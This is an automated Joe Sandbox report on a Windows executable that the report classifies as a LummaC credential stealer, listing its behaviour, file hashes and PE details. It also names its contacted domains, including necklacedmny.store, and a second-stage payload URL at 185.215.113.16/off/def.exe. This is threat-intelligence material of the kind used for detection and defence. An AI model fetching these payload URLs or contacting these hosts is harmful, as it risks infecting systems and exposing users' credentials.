          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
          https://www.ecosia.org/newtab/0%URL Reputationsafe
          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
          https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
          http://x1.c.lencr.org/00%URL Reputationsafe
          http://x1.i.lencr.org/00%URL Reputationsafe
          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
          http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
          https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          necklacedmny.store
          		188.114.97.3
          		truetrue
            		unknown
            s-part-0032.t-0009.t-msedge.net
            		13.107.246.60
            		truefalse
              		unknown
              presticitpo.store
              		unknown
              		unknowntrue
                		unknown
                thumbystriw.store
                		unknown
                		unknowntrue
                  		unknown
                  time.windows.com
                  		unknown
                  		unknownfalse
                    		unknown
                    crisiwarny.store
                    		unknown
                    		unknowntrue
                      		unknown
                      fadehairucw.store
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://necklacedmny.store/apitrue
                          		unknown
                          presticitpo.storetrue
                            		unknown
                            scriptyprefej.storetrue
                              		unknown
                              necklacedmny.storetrue
                                		unknown
                                fadehairucw.storetrue
                                  		unknown
                                  navygenerayk.storetrue
                                    		unknown
                                    founpiuer.storetrue
                                      		unknown
                                      thumbystriw.storetrue
                                        		unknown
                                        crisiwarny.storetrue
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.1410146237.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410295645.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410073692.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://185.215.113.16/_file.exe, 00000000.00000003.1609473315.0000000001532000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1620130895.0000000001533000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.1410146237.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410295645.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410073692.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.1410146237.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410295645.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410073692.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://necklacedmny.store/api~file.exe, 00000000.00000003.1516998293.0000000001569000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1528854047.0000000001569000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1521751055.000000000156B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1517530592.000000000156B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.1410146237.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410295645.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410073692.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.1478178455.0000000005DBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.1410146237.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410295645.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410073692.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://necklacedmny.store/apiQfile.exe, 00000000.00000003.1609473315.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1619866757.00000000014FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.1478178455.0000000005DBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://www.ecosia.org/newtab/file.exe, 00000000.00000003.1410146237.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410295645.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410073692.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://necklacedmny.store/apiKfile.exe, 00000000.00000003.1609473315.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1619866757.00000000014FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.1479304918.0000000005FD4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.1410146237.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410295645.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410073692.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://185.215.113.16/file.exe, 00000000.00000003.1609473315.0000000001532000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1620130895.0000000001533000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://necklacedmny.store/file.exe, 00000000.00000003.1492508227.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1521685992.0000000005CE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://x1.c.lencr.org/0file.exe, 00000000.00000003.1478178455.0000000005DBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://x1.i.lencr.org/0file.exe, 00000000.00000003.1478178455.0000000005DBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.1410146237.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410295645.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410073692.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://necklacedmny.store/Xffile.exe, 00000000.00000003.1517438530.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1521685992.0000000005CE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.1478178455.0000000005DBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://necklacedmny.store/Febfile.exe, 00000000.00000003.1609473315.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1619866757.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1521824876.00000000014FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://necklacedmny.store/apivfile.exe, 00000000.00000003.1609473315.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1619866757.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1521824876.00000000014FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://185.215.113.16/0file.exe, 00000000.00000003.1609473315.0000000001532000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1620130895.0000000001533000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://necklacedmny.store/api2file.exe, 00000000.00000003.1528854047.0000000001569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://185.215.113.16/off/def.exefile.exe, 00000000.00000003.1609473315.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1619866757.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1612094849.0000000000F3A000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.1479304918.0000000005FD4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.1410146237.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410295645.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410073692.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://185.215.113.16/off/def.exedfile.exe, 00000000.00000003.1609473315.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1619866757.00000000014FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://necklacedmny.store/nmfile.exe, 00000000.00000003.1609473315.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1619866757.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1521824876.00000000014FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown

                                                                          World Map of Contacted IPs

                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs

                                                                          Public IPs

                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          188.114.97.3
                                                                          		necklacedmny.storeEuropean Union
                                                                          		13335CLOUDFLARENETUStrue
                                                                          185.215.113.16
                                                                          		unknownPortugal
                                                                          		206894WHOLESALECONNECTIONSNLfalse

                                                                          General Information

                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1544501
                                                                          Start date and time:2024-10-29 14:10:07 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 5m 32s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:6
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:file.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.evad.winEXE@3/2@6/2
                                                                          EGA Information:
                                                                          • Successful, ratio: 50%
                                                                          HCA Information:Failed
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Stop behavior analysis, all processes terminated

                                                                          Warnings

                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 20.101.57.9
                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, twc.trafficmanager.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                          • Execution Graph export aborted for target file.exe, PID 7308 because there are no executed function
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: file.exe

                                                                          Simulations

                                                                          Behavior and APIs

                                                                          TimeTypeDescription
                                                                          09:11:18API Interceptor9x Sleep call for process: file.exe modified

                                                                          Joe Sandbox View / Context

                                                                          IPs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          188.114.97.3rPO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                          • www.launchdreamidea.xyz/2b9b/
                                                                          rPO_28102400.exeGet hashmaliciousLokibotBrowse
                                                                          • ghcopz.shop/ClarkB/PWS/fre.php
                                                                          PbfYaIvR5B.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          • windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
                                                                          SR3JZpolPo.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                          • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                                          5Z1WFRMTOXRH6X21Z8NU8.exeGet hashmaliciousUnknownBrowse
                                                                          • artvisions-autoinsider.com/8bkjdSdfjCe/index.php
                                                                          PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                                                          • www.cc101.pro/4hfb/
                                                                          QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • filetransfer.io/data-package/cDXpxO66/download
                                                                          Instruction_1928.pdf.lnk.download.lnkGet hashmaliciousLummaCBrowse
                                                                          • tech-tribune.shop/pLQvfD4d5/index.php
                                                                          WBCDZ4Z3M2667YBDZ5K4.bin.exeGet hashmaliciousUnknownBrowse
                                                                          • tech-tribune.shop/pLQvfD4d5/index.php
                                                                          yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                          • www.rs-ag.com/
                                                                          185.215.113.16file.exeGet hashmaliciousLummaCBrowse
                                                                          • 185.215.113.16/off/def.exe
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 185.215.113.16/off/def.exe
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 185.215.113.16/off/def.exe
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 185.215.113.16/off/def.exe
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 185.215.113.16/off/def.exe
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 185.215.113.16/off/def.exe
                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Quasar, StealcBrowse
                                                                          • 185.215.113.16/Jo89Ku7d/index.php
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 185.215.113.16/off/def.exe
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 185.215.113.16/off/def.exe
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 185.215.113.16/off/def.exe

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          s-part-0032.t-0009.t-msedge.nethttps://pub-75eadb7757ac4bf2ab3de7c52d2a4895.r2.dev/index.html#'+tFjvjBPh,document%5B'body'%5D%5B'appendChild'%5D(para);Get hashmaliciousUnknownBrowse
                                                                          • 13.107.246.60
                                                                          https://docs.google.com/drawings/d/1OzqwiA1nI8GUoiKob_qJY5xL1HmGK6VrRXlYUDuD68w/preview?pli=1JXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlGet hashmaliciousMamba2FABrowse
                                                                          • 13.107.246.60
                                                                          Jo Smalley shared _Harbour Healthcare Ltd Project_ with you..emlGet hashmaliciousHTMLPhisherBrowse
                                                                          • 13.107.246.60
                                                                          Jo Smalley shared _Harbour Healthcare Ltd Project_ with you..emlGet hashmaliciousHTMLPhisherBrowse
                                                                          • 13.107.246.60
                                                                          https://dvhpkbq.sharing.bublup.com/mybublup/#/mystuff/001-f-cb6f5ea2-07bf-4021-a767-4b4547f8c10b/mixed?lid=001-si-_s1J1-rGiVhhGet hashmaliciousHTMLPhisherBrowse
                                                                          • 13.107.246.60
                                                                          https://banginggamestore.xyz/?encoded_value=223GDT1&sub1=239ba09cf2754b24813bab1ed4e19d57&sub2=&sub3=&sub4=&sub5=21539&source_id=20131&ip=94.107.182.21&domain=www.followthislinknow.comGet hashmaliciousUnknownBrowse
                                                                          • 13.107.246.60
                                                                          https://iqzvfstfgkhjbcqj.pretest.com.br/fnjsagvklebfioyedsh/nfsavlkwhjvfedklhdf/fadkhvgqeuklhteiupog/sj.kim5@hdel.co.krGet hashmaliciousPhisherBrowse
                                                                          • 13.107.246.60
                                                                          http://prabal-gupta-lcatterton-com.athuselevadores.com.br/Get hashmaliciousHTMLPhisherBrowse
                                                                          • 13.107.246.60
                                                                          https://api.inspectrealestate.com.au/email/track?eta=1&t=B32-5UARLGTXC6GHXC7PJPHCGUP7HMF6FJEQ76L6MOL7WYB6P6EYQNBONANBBGKOXFRO3HPDET5TXGOZXG5FJNMJJC437YUYUWDF5VEVIWPK6LECEZJV3OMRCXF6VI76ZOGYOFIOERVACTHYB4KHK22IKKEWLYPTUBLONXLA7QVY2SW2TZMW4ULVG2UAKDR3DM3RL4TTJAF3F3ROXQ3ZLRVYS7Z2T4TIQETEEUV73V42AQLF65YKSUX6JMYEW3ZHXPREAMXXBOQV32GKOYOISFZKX4GPTPR2IMSMCULLR2V4QUSMU3MWF7NQ%3D%3D%3D%3DGet hashmaliciousUnknownBrowse
                                                                          • 13.107.246.60
                                                                          https://hianime.toGet hashmaliciousUnknownBrowse
                                                                          • 13.107.246.60
                                                                          necklacedmny.storefile.exeGet hashmaliciousLummaCBrowse
                                                                          • 188.114.97.3
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 188.114.96.3
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 188.114.96.3
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 188.114.96.3
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 188.114.97.3
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 188.114.96.3
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 188.114.96.3
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 188.114.96.3
                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Quasar, StealcBrowse
                                                                          • 188.114.97.3
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 188.114.97.3

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          CLOUDFLARENETUShttps://u.to/Ipn6IAGet hashmaliciousUnknownBrowse
                                                                          • 104.21.233.198
                                                                          ZoomInstaller.exeGet hashmaliciousUnknownBrowse
                                                                          • 188.114.97.3
                                                                          Documentos.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 188.114.97.3
                                                                          PAGO FRAS PENDIENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 188.114.97.3
                                                                          https://assets-usa.mkt.dynamics.com/a915fd66-2592-ef11-8a66-00224803a417/digitalassets/standaloneforms/3d7495e3-e695-ef11-8a69-000d3a3501d6Get hashmaliciousMamba2FABrowse
                                                                          • 104.17.25.14
                                                                          rPO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                          • 188.114.97.3
                                                                          https://s6wgj.mjt.lu/lnk/BAAABjF2nGkAAAAAAAAAA8eBypUAAYKI49IAAAAAACyAswBnIDqHdUCxYEn6Q4ixPg97jrhvJQApDwU/1/UZoB7CDPf4C_dQRYOGMdHQ/aHR0cDovL3d3dy5jb25uZWN0aW5nb25saW5lLmNvbS5hci9TaXRlL0NsaWNrLmFzcHg_dD1jJmU9MjM0Mzgmc209MCZjPTM0NTQ4NDYmY3M9NWQ0ZDRpM2kmdXJsPWh0dHBzOi8vYnJpZGdybWFya2V0ZW4uc2EuY29tLzdtdUIv#Zsales@mackietransportation.comGet hashmaliciousHTMLPhisherBrowse
                                                                          • 104.17.25.14
                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                          • 172.64.41.3
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 188.114.97.3
                                                                          ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                          • 188.114.96.3
                                                                          WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                                                          • 185.215.113.206
                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                          • 185.215.113.206
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 185.215.113.16
                                                                          file.exeGet hashmaliciousStealcBrowse
                                                                          • 185.215.113.206
                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                          • 185.215.113.206
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 185.215.113.16
                                                                          file.exeGet hashmaliciousStealcBrowse
                                                                          • 185.215.113.206
                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                          • 185.215.113.206
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 185.215.113.16
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 185.215.113.16

                                                                          JA3 Fingerprints

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                          • 188.114.97.3
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 188.114.97.3
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 188.114.97.3
                                                                          ST007 SWIFT CONFIRMATION.xlsGet hashmaliciousUnknownBrowse
                                                                          • 188.114.97.3
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 188.114.97.3
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 188.114.97.3
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 188.114.97.3
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 188.114.97.3
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 188.114.97.3
                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Quasar, StealcBrowse
                                                                          • 188.114.97.3

                                                                          Dropped Files

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exefile.exeGet hashmaliciousLummaCBrowse

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\7V52BG1QZHX6WU0LEYA.exe.log

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exe
                                                                            File Type:CSV text
                                                                            Category:dropped
                                                                            Size (bytes):226
                                                                            Entropy (8bit):5.360398796477698
                                                                            Encrypted:false
                                                                            SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                            MD5:3A8957C6382192B71471BD14359D0B12
                                                                            SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                            SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                            SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                                                                            C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exe

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):2810880
                                                                            Entropy (8bit):6.500975943295361
                                                                            Encrypted:false
                                                                            SSDEEP:49152:sbl8NLf5l65zMHulhS0q7Hg/KRExidAe5:sbl8NLff0zMOTS09xidAe
                                                                            MD5:7860724D095EE801E47A74168A09B6C4
                                                                            SHA1:8556046DC3094ADEE963C6B87242B4A4DB428453
                                                                            SHA-256:786815EEFC4562898758FB1D07EE126AB4A887DBAACD98C37C5FAF367D2CD3E1
                                                                            SHA-512:43179C759A989A12C0A65DF446FF5374EC3928AE9FBABC2EBF4C105860D4618B1AC41E4D3DF4B971974AEC7849069ED22EFF8CFB168304B3EC3A6035D72E2623
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            Joe Sandbox View:
                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                            Reputation:low
                                                                            Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$...........`+.. ...`....@.. ........................+......{+...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...bvojmhev..*.......*..:..............@...wyxhjguh. ...@+.......*.............@....taggant.@...`+.."....*.............@...................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):6.556168095881687
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:file.exe
                                                                            File size:2'994'688 bytes
                                                                            MD5:72495bc5ddc3bd55a1f0c69fe26b528a
                                                                            SHA1:778a438bb451fb333adfe44c00ac8765bdeff1ef
                                                                            SHA256:43ffd1d60c05d7b75c4fba5f21cad771f98e6c42af01b767e574143603546579
                                                                            SHA512:a1a2613418a9c55c9114f09f2a44542fa2bbe91ae2654dd881d0f4170a44dea34347c39bc8de081f0db5f9182941fd5d4eceb4a7a9026823c51e417546836d90
                                                                            SSDEEP:49152:W237ptIOL0tOe24MpVw19yB+DFVeZiUoc+TyF:ZrptIOL04e24MpV49yMVeZm9WF
                                                                            TLSH:02D56CE1B90472CFE49E17B88927DE46592C47B52B1049C3ED6C647EBD73CC12ABAC18
                                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............0...........@...........................0.....D.-...@.................................T...h..

                                                                            File Icon

                                                                            Icon Hash:00928e8e8686b000

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x70c000
                                                                            Entrypoint Section:.taggant
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:6
                                                                            OS Version Minor:0
                                                                            File Version Major:6
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:6
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            jmp 00007F4F288D016Ah
                                                                            seto byte ptr [00000000h]
                                                                            add cl, ch
                                                                            add byte ptr [eax], ah
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
